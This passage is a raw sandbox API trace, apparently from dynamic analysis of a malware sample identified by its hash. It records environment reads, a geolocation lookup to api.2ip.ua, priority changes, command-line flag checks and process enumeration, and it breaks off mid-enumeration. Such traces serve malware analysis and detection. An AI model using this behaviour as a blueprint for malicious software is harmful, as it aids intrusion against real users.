cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TEMP=C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", lpUsedDefaultChar=0x0) returned 42 [0097.224] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x611920, Size=0x7c) returned 0x611920 [0097.224] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TMP=C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0097.224] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x29) returned 0x60b540 [0097.224] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TMP=C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x60b540, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TMP=C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", lpUsedDefaultChar=0x0) returned 41 [0097.224] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x611920, Size=0x80) returned 0x611920 [0097.224] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERDOMAIN=Q9IATRKPRH", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0097.224] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x16) returned 0x611838 [0097.224] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERDOMAIN=Q9IATRKPRH", cchWideChar=-1, lpMultiByteStr=0x611838, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERDOMAIN=Q9IATRKPRH", lpUsedDefaultChar=0x0) returned 22 [0097.224] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x611920, Size=0x84) returned 0x611920 [0097.224] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERNAME=kEecfMwgj", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0097.224] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x13) returned 0x611858 [0097.224] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERNAME=kEecfMwgj", cchWideChar=-1, lpMultiByteStr=0x611858, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERNAME=kEecfMwgj", lpUsedDefaultChar=0x0) returned 19 [0097.224] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x611920, Size=0x88) returned 0x611920 [0097.224] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERPROFILE=C:\\Users\\kEecfMwgj", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0097.224] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x1f) returned 0x60ec70 [0097.224] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERPROFILE=C:\\Users\\kEecfMwgj", cchWideChar=-1, lpMultiByteStr=0x60ec70, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERPROFILE=C:\\Users\\kEecfMwgj", lpUsedDefaultChar=0x0) returned 31 [0097.224] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x611920, Size=0x8c) returned 0x611920 [0097.224] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windir=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0097.224] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x12) returned 0x611878 [0097.224] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windir=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x611878, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windir=C:\\Windows", lpUsedDefaultChar=0x0) returned 18 [0097.225] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x611920, Size=0x90) returned 0x611920 [0097.225] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_flags=3", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0097.225] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x18) returned 0x6119b8 [0097.225] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_flags=3", cchWideChar=-1, lpMultiByteStr=0x6119b8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windows_tracing_flags=3", lpUsedDefaultChar=0x0) returned 24 [0097.225] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x611920, Size=0x94) returned 0x6119d8 [0097.225] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 70 [0097.225] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x46) returned 0x606ee0 [0097.225] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", cchWideChar=-1, lpMultiByteStr=0x606ee0, cbMultiByte=70, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", lpUsedDefaultChar=0x0) returned 70 [0097.225] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6119d8, Size=0x98) returned 0x6119d8 [0097.252] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x610f20) returned 0x80 [0097.252] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x610f20) returned 0x80 [0097.252] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x610f20) returned 0x80 [0097.279] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x8ec) returned 0x611a78 [0097.279] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x610f20) returned 0x80 [0097.280] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x10) returned 0x603268 [0097.280] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x610f20) returned 0x80 [0097.280] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x610f20) returned 0x80 [0097.280] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x610f20) returned 0x80 [0097.310] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x610f20) returned 0x80 [0097.337] InternetOpenW (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0097.464] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x40) returned 0x6027f0 [0097.465] InternetOpenUrlW (hInternet=0xcc0004, lpszUrl="https://api.2ip.ua/geo.json", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0098.304] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x18c1c8, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x18e9c8 | out: lpBuffer=0x18c1c8*, lpdwNumberOfBytesRead=0x18e9c8*=0x22a) returned 1 [0098.305] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0098.305] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0098.305] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x20) returned 0x618718 [0098.311] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x240) returned 0x2b830c0 [0098.319] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x2b830c0 | out: hHeap=0x5f0000) returned 1 [0098.319] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x618718 | out: hHeap=0x5f0000) returned 1 [0098.319] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6027f0 | out: hHeap=0x5f0000) returned 1 [0098.319] GetCurrentProcess () returned 0xffffffff [0098.319] GetLastError () returned 0x0 [0098.319] SetPriorityClass (hProcess=0xffffffff, dwPriorityClass=0x80) returned 1 [0098.334] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x10) returned 0x627650 [0098.334] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x8ec) returned 0x62c290 [0098.383] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x800) returned 0x2b64160 [0098.383] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2b64160, nSize=0x400 | out: lpFilename="C:\\Users\\kEecfMwgj\\Desktop\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe")) returned 0x5f [0098.383] PathRemoveFileSpecW (in: pszPath="C:\\Users\\kEecfMwgj\\Desktop\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe" | out: pszPath="C:\\Users\\kEecfMwgj\\Desktop") returned 1 [0098.390] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x810) returned 0x2b6d2b0 [0098.390] GetCommandLineW () returned="\"C:\\Users\\kEecfMwgj\\Desktop\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe\" --Admin IsNotAutoStart IsNotTask" [0098.390] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\kEecfMwgj\\Desktop\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe\" --Admin IsNotAutoStart IsNotTask", pNumArgs=0x18eaa8 | out: pNumArgs=0x18eaa8) returned 0x2b56a70*="C:\\Users\\kEecfMwgj\\Desktop\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe" [0098.390] lstrcpyW (in: lpString1=0x18f738, lpString2="C:\\Users\\kEecfMwgj\\Desktop\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe" | out: lpString1="C:\\Users\\kEecfMwgj\\Desktop\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe") returned="C:\\Users\\kEecfMwgj\\Desktop\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe" [0098.390] lstrcmpW (lpString1="IsAutoStart", lpString2="IsNotAutoStart") returned -1 [0098.390] lstrcmpW (lpString1="IsTask", lpString2="IsNotTask") returned 1 [0098.450] GetCommandLineW () returned="\"C:\\Users\\kEecfMwgj\\Desktop\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe\" --Admin IsNotAutoStart IsNotTask" [0098.450] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\kEecfMwgj\\Desktop\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe\" --Admin IsNotAutoStart IsNotTask", pNumArgs=0x18ea44 | out: pNumArgs=0x18ea44) returned 0x2b56a70*="C:\\Users\\kEecfMwgj\\Desktop\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe" [0098.450] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe") returned="1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe" [0098.451] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x752b0000 [0098.451] GetProcAddress (hModule=0x752b0000, lpProcName="EnumProcesses") returned 0x0 [0098.451] GetProcAddress (hModule=0x752b0000, lpProcName="EnumProcessModules") returned 0x0 [0098.452] GetProcAddress (hModule=0x752b0000, lpProcName="GetModuleBaseNameW") returned 0x0 [0098.452] LoadLibraryW (lpLibFileName="Psapi.dll") returned 0x75950000 [0098.456] GetProcAddress (hModule=0x75950000, lpProcName="EnumProcesses") returned 0x75951544 [0098.457] GetProcAddress (hModule=0x75950000, lpProcName="EnumProcessModules") returned 0x75951408 [0098.457] GetProcAddress (hModule=0x75950000, lpProcName="GetModuleBaseNameW") returned 0x7595152c [0098.457] EnumProcesses (in: lpidProcess=0x184240, cb=0xa000, lpcbNeeded=0x18ea50 | out: lpidProcess=0x184240, lpcbNeeded=0x18ea50) returned 1 [0098.486] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0098.486] CloseHandle (hObject=0x0) returned 0 [0098.486] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0098.486] CloseHandle (hObject=0x0) returned 0 [0098.486] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x10c) returned 0x0 [0098.486] CloseHandle (hObject=0x0) returned 0 [0098.487] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x150) returned 0x0 [0098.487] CloseHandle (hObject=0x0) returned 0 [0098.487] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x174) returned 0x0 [0098.487] CloseHandle (hObject=0x0) returned 0 [0098.487] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x180) returned 0x0 [0098.487] CloseHandle (hObject=0x0) returned 0 [0098.487] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1a8) returned 0x0 [0098.487] CloseHandle (hObject=0x0) returned 0 [0098.487] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0098.487] CloseHandle (hObject=0x0) returned 0 [0098.487] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0098.487] CloseHandle (hObject=0x0) returned 0 [0098.487] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0098.487] CloseHandle (hObject=0x0) returned 0 [0098.488] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x250) returned 0x0 [0098.488] CloseHandle (hObject=0x0) returned 0 [0098.488] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0098.488] CloseHandle (hObject=0x0) returned 0 [0098.488] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x2c4) returned 0x0 [0098.488] CloseHandle (hObject=0x0) returned 0 [0098.488] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0098.488] CloseHandle (hObject=0x0) returned 0 [0098.488] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x368) returned 0x0 [0098.488] CloseHandle (hObject=0x0) returned 0 [0098.488] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0098.488] CloseHandle (hObject=0x0) returned 0 [0098.488] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0098.488] CloseHandle (hObject=0x0) returned 0 [0098.489] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x454) returned 0x0 [0098.489] CloseHandle (hObject=0x0) returned 0 [0098.489] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x474) returned 0x4e8 [0098.489] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 0 [0098.489] CloseHandle (hObject=0x4e8) returned 1 [0098.489] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x494) returned 0x0 [0098.489] CloseHandle (hObject=0x0) returned 0 [0098.489] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x520) returned 0x0 [0098.489] CloseHandle (hObject=0x0) returned 0 [0098.489] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x558) returned 0x0 [0098.490] CloseHandle (hObject=0x0) returned 0 [0098.490] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x770) returned 0x4e8 [0098.490] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 0 [0098.490] CloseHandle (hObject=0x4e8) returned 1 [0098.490] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x77c) returned 0x4e8 [0098.490] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 0 [0098.490] CloseHandle (hObject=0x4e8) returned 1 [0098.490] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x550) returned 0x0 [0098.490] CloseHandle (hObject=0x0) returned 0 [0098.490] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x78c) returned 0x0 [0098.490] CloseHandle (hObject=0x0) returned 0 [0098.491] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x5d8) returned 0x0 [0098.491] CloseHandle (hObject=0x0) returned 0 [0098.509] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x734) returned 0x4e8 [0098.510] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0098.514] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x2c0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="iexplore.exe") returned 0xc [0098.515] CloseHandle (hObject=0x4e8) returned 1 [0098.515] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x134) returned 0x4e8 [0098.515] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0098.519] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x2c0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="iexplore.exe") returned 0xc [0098.520] CloseHandle (hObject=0x4e8) returned 1 [0098.520] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x844) returned 0x0 [0098.520] CloseHandle (hObject=0x0) returned 0 [0098.520] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x92c) returned 0x4e8 [0098.520] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0098.521] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xba0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="representshoot.exe") returned 0x12 [0098.522] CloseHandle (hObject=0x4e8) returned 1 [0098.522] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x934) returned 0x4e8 [0098.522] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0098.523] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x1080000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="watch wait.exe") returned 0xe [0098.523] CloseHandle (hObject=0x4e8) returned 1 [0098.523] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x93c) returned 0x4e8 [0098.523] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0098.525] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x3b0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="also-involve.exe") returned 0x10 [0098.525] CloseHandle (hObject=0x4e8) returned 1 [0098.525] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x944) returned 0x4e8 [0098.525] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0098.526] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x920000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="range.exe") returned 0x9 [0098.527] CloseHandle (hObject=0x4e8) returned 1 [0098.527] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x94c) returned 0x4e8 [0098.527] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0098.528] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x1220000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="good-buy.exe") returned 0xc [0098.529] CloseHandle (hObject=0x4e8) returned 1 [0098.529] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x954) returned 0x4e8 [0098.529] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0098.530] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xeb0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="heat full.exe") returned 0xd [0098.530] CloseHandle (hObject=0x4e8) returned 1 [0098.530] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x95c) returned 0x4e8 [0098.531] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0098.532] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x260000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="none.exe") returned 0x8 [0098.532] CloseHandle (hObject=0x4e8) returned 1 [0098.532] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x964) returned 0x4e8 [0098.532] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0098.552] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x11b0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="existphonefollow.exe") returned 0x14 [0098.552] CloseHandle (hObject=0x4e8) returned 1 [0098.552] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x96c) returned 0x4e8 [0098.552] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0098.554] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x840000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="direction.exe") returned 0xd [0098.554] CloseHandle (hObject=0x4e8) returned 1 [0098.554] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x974) returned 0x4e8 [0098.554] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0098.555] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xee0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="again_after.exe") returned 0xf [0098.556] CloseHandle (hObject=0x4e8) returned 1 [0098.556] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x97c) returned 0x4e8 [0098.556] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0098.557] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x1240000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="include.exe") returned 0xb [0098.557] CloseHandle (hObject=0x4e8) returned 1 [0098.557] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x984) returned 0x4e8 [0098.557] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0098.559] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xbf0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="very land.exe") returned 0xd [0098.559] CloseHandle (hObject=0x4e8) returned 1 [0098.559] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9b0) returned 0x4e8 [0098.559] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0098.560] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x1280000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="according although relate.exe") returned 0x1d [0098.561] CloseHandle (hObject=0x4e8) returned 1 [0098.561] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9bc) returned 0x4e8 [0098.561] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0098.562] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xc10000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="soldier foot themselves.exe") returned 0x1b [0098.562] CloseHandle (hObject=0x4e8) returned 1 [0098.562] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9c8) returned 0x4e8 [0098.563] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0098.564] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xc0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="before_deal_next.exe") returned 0x14 [0098.564] CloseHandle (hObject=0x4e8) returned 1 [0098.564] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9d4) returned 0x4e8 [0098.564] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0098.565] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xa00000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="season_who.exe") returned 0xe [0098.566] CloseHandle (hObject=0x4e8) returned 1 [0098.566] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9e0) returned 0x4e8 [0098.566] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0098.567] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x120000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="pay.exe") returned 0x7 [0098.567] CloseHandle (hObject=0x4e8) returned 1 [0098.567] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9ec) returned 0x4e8 